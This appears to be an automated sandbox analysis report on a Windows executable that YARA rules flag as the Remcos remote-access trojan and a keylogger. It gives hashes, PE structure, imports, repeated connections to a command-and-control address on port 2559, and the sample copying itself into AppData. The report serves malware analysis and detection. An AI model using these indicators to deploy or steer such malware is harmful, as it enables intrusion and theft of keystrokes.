                                            MD5:f484f16874ddb071b45cb9f1fa8d0c56
                                            SHA1:8cf9f6ab9a0a8520650145ae1702cc35f0e4b123
                                            SHA256:12f38b57f20acea350ed883756309c9516c6b5b814ebedcb19dcb5ba798579e1
                                            SHA512:a20a46f56d408e9b2b5dcf956c9dec9a1170885fbbcb7c24a8caa6ed7202c30309bc72dc7a4c193ddb6f13cdc4c94e5f105e6d76cdff5b1d0585c7d807318e15
                                            SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6Fauf9v8AWLJgm9Ko2YyVWY:au0c++OCvkGs9Fauf9vJwJH9cYvY
                                            TLSH:A255CF2273DDC360CB669173BF69B7016EBF3C614630B95B2F880D7DA950162162DBA3
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                            Icon Hash:aaf3e3e3938382a0
                                            Entrypoint:0x427dcd
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x675674A0 [Mon Dec 9 04:40:00 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                            Instruction
                                            call 00007F8B7D279A8Ah
                                            jmp 00007F8B7D26C854h
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F8B7D26C9DAh
                                            cmp edi, eax
                                            jc 00007F8B7D26CD3Eh
                                            bt dword ptr [004C31FCh], 01h
                                            jnc 00007F8B7D26C9D9h
                                            rep movsb
                                            jmp 00007F8B7D26CCECh
                                            cmp ecx, 00000080h
                                            jc 00007F8B7D26CBA4h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F8B7D26C9E0h
                                            bt dword ptr [004BE324h], 01h
                                            jc 00007F8B7D26CEB0h
                                            bt dword ptr [004C31FCh], 00000000h
                                            jnc 00007F8B7D26CB7Dh
                                            test edi, 00000003h
                                            jne 00007F8B7D26CB8Eh
                                            test esi, 00000003h
                                            jne 00007F8B7D26CB6Dh
                                            bt edi, 02h
                                            jnc 00007F8B7D26C9DFh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F8B7D26C9E3h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F8B7D26CA35h
                                            bt esi, 03h
                                            jnc 00007F8B7D26CA88h
                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD4 build 31101
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD4 build 31101
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x7a944.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1420000x711c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0xc70000x7a9440x7aa00efbda78f1705fac83b3e77ba286db62cFalse0.9466265290519877data7.9328603924305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1420000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                            RT_RCDATA0xcf7b80x71c0bdata1.000324082321202
                                            RT_GROUP_ICON0x1413c40x76dataEnglishGreat Britain0.6610169491525424
                                            RT_GROUP_ICON0x14143c0x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x1414500x14dataEnglishGreat Britain1.15
                                            RT_GROUP_ICON0x1414640x14dataEnglishGreat Britain1.25
                                            RT_VERSION0x1414780xdcdataEnglishGreat Britain0.6181818181818182
                                            RT_MANIFEST0x1415540x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                            DLLImport
                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                            PSAPI.DLLGetProcessMemoryInfo
                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                            UxTheme.dllIsThemeActive
                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishGreat Britain
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 11, 2025 00:07:05.109534025 CET498572559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:05.115813971 CET255949857192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:05.116033077 CET498572559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:05.121388912 CET498572559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:05.126187086 CET255949857192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:26.497174978 CET255949857192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:26.497355938 CET498572559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:26.497510910 CET498572559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:26.502311945 CET255949857192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:27.501091003 CET499742559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:27.505999088 CET255949974192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:27.506091118 CET499742559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:27.510718107 CET499742559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:27.515532017 CET255949974192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:48.884401083 CET255949974192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:48.884521961 CET499742559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:48.884640932 CET499742559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:48.889381886 CET255949974192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:49.892203093 CET499762559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:49.897340059 CET255949976192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:07:49.897449970 CET499762559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:49.901403904 CET499762559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:07:49.906553984 CET255949976192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:11.263581038 CET255949976192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:11.264481068 CET499762559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:11.264617920 CET499762559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:11.269438982 CET255949976192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:12.266753912 CET499772559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:12.271656036 CET255949977192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:12.271743059 CET499772559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:12.275307894 CET499772559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:12.280119896 CET255949977192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:33.670284033 CET255949977192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:33.670381069 CET499772559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:33.670452118 CET499772559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:33.675226927 CET255949977192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:34.676031113 CET499782559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:34.680892944 CET255949978192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:34.680974007 CET499782559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:34.684602976 CET499782559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:34.689330101 CET255949978192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:56.061204910 CET255949978192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:56.062489986 CET499782559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:56.065656900 CET499782559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:56.073827028 CET255949978192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:57.079937935 CET499792559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:57.084975004 CET255949979192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:08:57.087079048 CET499792559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:57.091222048 CET499792559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:08:57.096117020 CET255949979192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:18.463421106 CET255949979192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:18.468489885 CET499792559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:18.468564987 CET499792559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:18.473381996 CET255949979192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:19.484003067 CET499802559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:19.489022970 CET255949980192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:19.490828037 CET499802559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:19.577183962 CET499802559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:19.582101107 CET255949980192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:40.871623993 CET255949980192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:40.871687889 CET499802559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:40.871750116 CET499802559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:40.876471043 CET255949980192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:41.876348972 CET499812559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:41.881133080 CET255949981192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:09:41.881198883 CET499812559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:41.885205984 CET499812559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:09:41.889977932 CET255949981192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:03.249950886 CET255949981192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:03.252532959 CET499812559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:03.252624035 CET499812559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:03.257419109 CET255949981192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:04.266923904 CET499822559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:04.271816969 CET255949982192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:04.272085905 CET499822559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:04.276889086 CET499822559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:04.281847000 CET255949982192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:25.673630953 CET255949982192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:25.676512003 CET499822559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:25.685173988 CET499822559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:25.691736937 CET255949982192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:26.692771912 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:26.698959112 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:26.700536966 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:26.704760075 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:26.711124897 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:48.918478012 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:48.918591976 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:48.918677092 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:48.918912888 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:48.918983936 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:48.919115067 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:48.919205904 CET499832559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:48.928009987 CET255949983192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:49.923023939 CET499842559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:49.927875042 CET255949984192.3.64.152192.168.2.11
                                            Jan 11, 2025 00:10:49.927959919 CET499842559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:49.931682110 CET499842559192.168.2.11192.3.64.152
                                            Jan 11, 2025 00:10:49.936435938 CET255949984192.3.64.152192.168.2.11
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 11, 2025 00:06:39.981091022 CET1.1.1.1192.168.2.110x5fdaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Jan 11, 2025 00:06:39.981091022 CET1.1.1.1192.168.2.110x5fdaNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:18:06:42
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\OKkUGRkZV7.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\OKkUGRkZV7.exe"
                                            Imagebase:0x340000
                                            File size:1'323'520 bytes
                                            MD5 hash:F484F16874DDB071B45CB9F1FA8D0C56
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:18:06:46
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\lecheries\ambiparous.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\OKkUGRkZV7.exe"
                                            Imagebase:0xaf0000
                                            File size:1'323'520 bytes
                                            MD5 hash:F484F16874DDB071B45CB9F1FA8D0C56
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
